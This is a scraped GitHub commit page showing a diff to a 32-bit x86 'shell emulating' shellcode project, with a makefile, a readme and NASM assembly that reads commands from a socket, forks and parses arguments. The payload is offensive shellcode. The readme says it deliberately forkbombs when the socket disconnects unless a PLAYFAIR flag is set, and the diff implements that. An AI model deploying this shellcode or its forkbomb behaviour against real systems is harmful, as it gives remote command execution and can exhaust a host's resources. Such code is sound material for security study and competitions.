Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit eebc301

Browse files
evanpjensenevanpjensen
committed
PLAYFAIR
1 parent c02dc45 commit eebc301

File tree

3 files changed

+35
-27
lines changed

3 files changed

+35
-27
lines changed

32shellEmulator/makefile

Lines changed: 4 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,14 +4,16 @@ INCLUDEDIR = ../include/
44
INCLUDE = -I $(INCLUDEDIR) -I $(RUNTIMEDIR)
55
CFLAGS = -m32 $(INCLUDE)
66
SFLAGS = -D INT80
7+
PLAYFAIR = -D PLAYFAIR
8+
79

810
TARGET=shell32.s
911

1012
all: assemble link
1113

1214
assemble: $(TARGET)
13-
nasm -f elf $(TARGET) $(INCLUDE) -o shellcode.o $(SFLAGS)
14-
nasm $(TARGET) $(INCLUDE) -o shellcode $(SFLAGS)
15+
nasm -f elf $(TARGET) $(INCLUDE) -o shellcode.o $(SFLAGS) $(PLAYFAIR)
16+
nasm $(TARGET) $(INCLUDE) -o shellcode $(SFLAGS) $(PLAYFAIR)
1517

1618
link: $(TARGET)
1719
gcc shellcode.o $(CFLAGS) -o test_shellcode

32shellEmulator/readme

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
32bit shell emulating payload will close gracefully when assembled with -D PLAYFAIR (Check makefile)
2+
If playfair is not defined, the payload will forkbomb when the socket is disconnected

32shellEmulator/shell32.s

Lines changed: 29 additions & 25 deletions
Original file line numberDiff line numberDiff line change
@@ -1,56 +1,60 @@
11
;; Evan Jensen 32bit shell emulating shellcode
22
;;
3-
3+
BITS 32
44
%include "short32.s"
55
%include "syscall.s"
66
%define BUFFERLEN 0x1ff
77

88
global main
99

1010
main:
11-
12-
do_fork:
13-
14-
SYSTEM_CALL(fork)
15-
test eax,eax
16-
jz short child
17-
parent:
18-
push byte 0
19-
push byte 0
20-
push byte 0
21-
pop ebx
22-
pop ecx
23-
pop edx
24-
SYSTEM_CALL(waitpid)
25-
jmp short do_fork
26-
child:
27-
cld
2811
2912
get_input:
3013
xor eax,eax
3114
cdq
3215
mov dx,BUFFERLEN
33-
sub esp,edx
3416
mov ecx,esp
3517
xor ebx,ebx
3618
SYSTEM_CALL(read)
3719
mov ebp,eax
3820
test eax,eax
39-
jz short do_exit ;synchronous IO or GTFO
40-
mov byte [eax+esp-1],0
21+
22+
%ifdef PLAYFAIR
23+
jz short do_exit ;test if socket is closed
24+
%endif
25+
mov byte [esp+eax-1],0
26+
4127

28+
do_fork:
29+
30+
SYSTEM_CALL(fork)
31+
test eax,eax
32+
jz short child
33+
parent:
34+
xor ebx,ebx
35+
xor ecx,ecx
36+
xor edx,edx
37+
SYSTEM_CALL(waitpid)
38+
jmp short main
4239

43-
;; push eax ;return of read pushed by get_input
44-
;; pop ecx
40+
child:
4541
42+
cld
4643
;let's parse the arguments here
47-
xchg eax,ecx
44+
45+
%ifndef PLAYFAIR
46+
test ebp,ebp ;return of read
47+
jz short do_fork
48+
%endif
49+
50+
parse:
51+
mov ecx, ebp
4852
push byte " "
4953
pop eax ;space used for inlined strchr
5054
mov ebx,esp
5155
cdq ;msb of eax is zero so this is ok
5256
53-
add esp,BUFFERLEN ;space for argv[]
57+
sub esp,BUFFERLEN ;space for argv[]
5458
add_token: ;; calculate the pointerp to push
5559
5660
mov esi,ebp

0 commit comments

Comments
 (0)